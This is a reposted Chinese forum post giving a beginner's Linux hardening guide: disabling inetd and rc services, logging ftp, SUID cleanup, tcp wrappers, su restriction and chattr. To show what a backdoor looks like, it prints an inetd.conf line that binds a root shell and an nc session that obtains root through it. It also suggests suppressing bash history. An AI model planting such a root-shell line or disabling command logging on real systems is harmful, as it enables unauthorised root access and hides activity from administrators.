返回列表 发帖

linux安全攻略(转)

本文参考sinbad网络安全站的那篇linux安全配置的文章的框架,呵呵,我不太会组织语法(语文差:)
呵呵,这篇文章的目的在于让读者对linux的安全配置有个大概的了解,呵呵,因为我也看过一些关于这方面的文章,说的太空了,呵呵 其实我觉得linux机器要做一般的安全配置的话,分分钟就搞定了,嘿嘿
1,安装
安装的时候,大家都轻车熟路了,呵呵,首先,隔离网络进行系统安装,当然选择custom方式,安装你需要的软件包。
硬盘分区:如果用root分区纪录数据,如log文件和email,就可能因为拒绝服务产生大量日志或垃圾邮件。导致系统崩溃。所以建议为/var开 辟单独的分区,用来存放日志和邮件,以避免root分区被溢出啦,那就惨喽。最好为特殊的应用程序单独开一个分区,特别是可以产生大量日志的程序,还有建议为/home单独分一个区,这样他们就不能填满/分区了,以下是我硬盘上的分区情况:
/   root
/var  log
/hacking  嘻嘻,我的一些黑软
swap   不多说了
/home
当系统安装完重新启动后,最好打上相应系统的安全补丁,请大家养成良好的习惯,记住,你不是在自己家里装98,你装的是一个linux服务器 ,呵呵。对于redhat系统而言可以在:http://www.redhat.com/corp/support/errata/找到补丁。
在redhat6.1以后的版本带有一个工具up2date,它能够测定哪些rpm包需要升级,然后自动从redhat的站点下载并完成安装。
2,关闭服务
呵呵,有句话说的好,要想你的系统绝对安全,就是掐断网线,呵呵,当然我们的机器要对外提供服务,那是不现实的,所以关闭不必要的服 务是必要的,因为有些服务会为您的系统带来麻烦。
默认的linux就是一个强大的系统,运行了很多的服务。但,有许多服务是不需要的,很容易引起安全风险。第一个文件是/etc/inetd.conf,它制定了/usr/sbin/inetd将要监听的服务,你可能只需要其中的两个:telnet和ftp,其他的许多如popd,imapd和rsh都是有可能引发安全问题的。用下面的命令显示没有被注释掉的服务:
suneagle# grep -v "#" /etc/inetd.conf
ftp   stream tcp   nowait root  /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp   nowait root  /usr/sbin/tcpd in.telnetd
shell  stream tcp   nowait root  /usr/sbin/tcpd in.rshd
login  stream tcp   nowait root  /usr/sbin/tcpd in.rlogind
talk  dgram  udp   wait  nobody.tty   /usr/sbin/tcpd in.talkd
ntalk  dgram  udp   wait  nobody.tty   /usr/sbin/tcpd in.ntalkd
pop-3  stream tcp   nowait root  /usr/sbin/tcpd ipop3d
imap  stream tcp   nowait root  /usr/sbin/tcpd imapd
finger stream tcp   nowait nobody /usr/sbin/tcpd in.fingerd
linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
exec  stream tcp   nowait root  /bin/sh sh -i
哈哈,大家看最后一行,不就被绑了个rootshell么?呵呵,有什么后果?呵呵看看,在远程的一台win2000机器上用如下命令:
E:\cmd>nc 192.0.0.88 512
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
bash#
知道了吧?嘿嘿,大家注意哦*^_^*
我有写过一篇关于用这个文件绑后门的文章,呵呵,攻击性很强,这个命令可以帮你查出有没有后门,呵呵。
下个要启动的是.rc脚本,它们决定了init进程要启动哪些服务。redhat系统下,这些脚本在/etc/rc.d/rc3.d(如果你的系统以x为默认启动的话,就是/etc/rc.d/rc5.d)。要在启动时禁止某个服务,只需要把大写的S替换为小写的s,同时,redhat也提供一个工具来帮助你关闭服务,输入/usr/sbin/setup,然后选择"system services",就可以定制系统启动时跑哪些服务。另外一个选择是chkconfig命令,很多linux版本的系
统都自带这个工具。脚本名字中的数字是启动的顺序,以大写的K开头的是杀死进程用的。以下是一些主要的服务:
S05apmd   笔记本需要
S10xntpd   网络时间协议
S11portmap  运行rpc服务必需
S15sound   声卡相关
S15netfs   nfs客户端
S20rstatd   避免运行r服务,远程用户可以从中获取很多信息
S20rusersd
S20rwhod
S20rwalld
S20bootparamd 无盘工作站
S25squid   代理服务
S34yppasswdd NIS服务器,此服务漏洞很多
S35ypserv   NIS服务器,此服务漏洞很多
S35dhcpd   dhcp服务
S40atd    和cron很相似的定时运行程序的服务
S45pcmcia   pcmcia卡,笔记本
S50snmpd   SNMP,远程用户能从中获得许多系统信息
S55named   DNS服务
S55routed   RIP,没有必要就别运行它
S60lpd    打印服务
S60mars-nwe  Netware的文件和打印服务
S60nfs    NFS服务器,漏洞极多
S72amd    automount,mount远程用的
S75gated   另外一种路由服务,例如OSPF
S80sendmail 邮件服务,如关闭,仍然可以发信,只是不能收信和作中继
S85httpd   web服务器
S87ypbind   NIS客户端
S90xfs    X font服务器
S95innd    News服务器
Slinuxconf  这个都熟悉吧,呵呵,通过浏览器远程管理系统用的
用这个命令察看在关闭启动脚本之前有多少服务在运行:
suneagle# ps -eaf|wc -l
54
我的系统有54种服务在运行呢,当你关闭一些服务以后,重新运行以上命令看看少了多少服务。运行的服务越少,系统自然越安全了,嘿嘿。用下面命令察看哪些服务在运行:
suneagle# netstat -na --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address      Foreign Address     State
tcp    0  136 192.0.0.88:23      192.0.0.5:1236     ESTABLISHED
tcp    0   0 192.0.0.88:23      192.0.0.8:1113     ESTABLISHED
tcp    0   0 192.0.0.88:139     192.0.0.8:1112     ESTABLISHED
tcp    0   0 192.0.0.88:1024     61.153.17.24:23     ESTABLISHED
tcp    0   0 192.0.0.88:23      192.0.0.8:1084     ESTABLISHED
tcp    0   0 0.0.0.0:139       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:80       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:25       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:515       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:512       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:98       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:79       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:143       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:110       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:513       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:514       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:23       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:21       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:113       0.0.0.0:*        LISTEN
tcp    0   0 0.0.0.0:111       0.0.0.0:*        LISTEN
udp    0   0 127.0.0.1:1024     0.0.0.0:*
udp    0   0 192.0.0.88:138     0.0.0.0:*
udp    0   0 192.0.0.88:137     0.0.0.0:*
udp    0   0 0.0.0.0:138       0.0.0.0:*
udp    0   0 0.0.0.0:137       0.0.0.0:*
udp    0   0 0.0.0.0:518       0.0.0.0:*
udp    0   0 0.0.0.0:517       0.0.0.0:*
udp    0   0 0.0.0.0:111       0.0.0.0:*
raw    0   0 0.0.0.0:1        0.0.0.0:*        7
raw    0   0 0.0.0.0:6        0.0.0.0:*        7
呵呵,我这个系统由于测试用,所以故意开了不少危险端口,呵呵,大家别学我哦,该关的就关啦,哈哈。
3,日志纪录和增强
关闭一些不必要的服务以后,日志也是需要我们关心的一块,配置好的unix系统日志非常强大,甚至可以做出陷阱,关于日志,我可以写长篇大论,这里就不很详细讲述日志的原理了,感兴趣的朋友可以参考相关资料或阅读我的另一篇文章《solaris系统日志原理》。好!所有的日志都在/var/log下(仅对linux系统而言),默认情况下linux的日志就很强大了,除了ftp。但我们可以通过修改/etc/ftpaccess或者/etc/inetd.conf,来保证每一个ftp连接日志都能够纪录下来。下面是一个修改inetd.conf的例子:
ftp  stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -L -i -o
-l 每一个ftp连接都写到syslog
-L 纪录用户的每一个命令
-i 文件received,纪录到xferlog
-o 文件transmitted,记录到xferlog
账号的安全问题
删除/etc/passwd&/etc/shadow中的一些系统账号,如mail,news等等。尽量关闭匿名ftp服务,删掉ftp用户。
/etc/ftpusers文件,包含了不能使用ftp的用户列表,root应该在其中。
修改/etc/securetty,去除终端ttyp0-ttyp9,使root只能从console或者使用ssh登陆。/etc/issue,不要让次文件透露系统信息。同时要修改/etc/rc.d/rc/local。SUID程序是非常危险的,这些程序被普通用户以euid=0(即root)的身份执行,只能有少量程序被设置为SUID。用一下命令列出系统的SUID二进制程序:
suneagle# find / -perm -4000 -print
用chmod -s去掉一些不需要程序的suid位。
4,连接服务器
作为系统管理员,需要经常对系统进行关系和上传文件,这些通过通信过程必须要保证是安全的。我介绍两个方法:ssh和tcp wrappers。
其实我比较偏向于用ssh,它把你和防火墙之间的通信全部进行了加密,而tcp wrappers没有做到加密一点,呵呵虽然现在先进的sniffer技术也可以嗅探到ssh的数据包,但它依然还是最安全的。建议用ssh完全取代telnet/ftp,它能够确保数据在网络中的安全传输。ssh和tcpwrapper都有它们自己的日志纪录,并设有访问控制策略,大家如果要深入了解ssh的话,可以参考想关书籍。
tcpwrappers尽管没有对数据进行加密,但它有日志系统并且可以控制哪些人可以访问你的系统,它在inetd中包装了其他的二进制文件,如telnet,ftp,finger等等。系统用tcpwrapper进行inetd监听连接,记录了所有请求并且与访问控制列表作比较,如果允许连接,tcpwrapper将调用实际的服务器进程来连接,如in.telnetd服务,如果拒绝,连接将断开。对linux用户比较幸运的是tcpwrapper已经被默认安装了,我们所要做的就是编辑/etc/hosts.allow和/etc/hosts.deny两个文件,注意以下事项:
1,尽量使用ip
2,首先通过/etc/hosts.deny禁止来自任何地方对所有服务的访问:ALL:ALL
然后在/etc/hosts.allow中添加要授权的机器及服务。冒号左边为服务,冒号右边为授权机器。
5,加固系统
一上的措施足以应付一般的网络攻击,但你的系统不是100%安全的,从来就没有绝对安全的系统,不是么?嘿嘿。我们来进一步加固系统!
编辑/etc/groups,增加wheel组(其实我很喜欢freebsd的地方,就是默认freebsd这些工作做的很好)。这个组包含了一些用户,可以执行/bin/su等强大的命令。对其他用户执行这些命令的控制,可以改善系统的安全。如下命令:
suneagle# /bin/chgrp wheel /bin/su
suneagle# /bin/chmod 4750 /bin/su
然后锁定一些文件:.rhosts,.netrc,/etc/hosts.equiv。r命令可以通过这些文件远程连入你的系统。先touch这些文件,然后chmod至0。
suneagle# /bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv;/bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv
linux还有一个众所周知的命令:chattr,呵呵+i操作,即使是root,也在-i之前改不了它们,先在你的系统的/etc/shadow,/etc/inetd.conf等文件来个chattr +i可以避免一下exploit给你添后门什么的,呵呵。
bash的问题
对于bash用户来讲,有个.bash_history文件,可以记录你的所用的命令,谁也不希望其他人包括root知道自己敲了哪些命令吧?我有两种方法来解决这个问题
1,在自己的.bash_profile文件中加入一行:
HISTFILESIZE=0
记住不要把HISTSIZE置零,那样就无法使用上下健来调用历史命令了。
2,删除自己目录下的.bash_history,然后建立一个连接:
suneagle$ ln -s /dev/null $HOME/.bash_history
这样,大家理解吧?历史命令都掉到黑洞洞里啦~~~~~
最后,保证物理安全,建立在/etc/lilo.conf中设置密码来控制linux的启动,呵呵,虽然也是可以被破解的,嘿嘿,因为它是明文存放,破解方法吗,知者知之,不知者就不知啦,嘿嘿。
ok,写了这么多,大概把安全性讲了一下,算是可一个不错的入门教材。

linux安全攻略(转)

谢谢你的帖子。冷清兄

TOP

返回列表 回复 发帖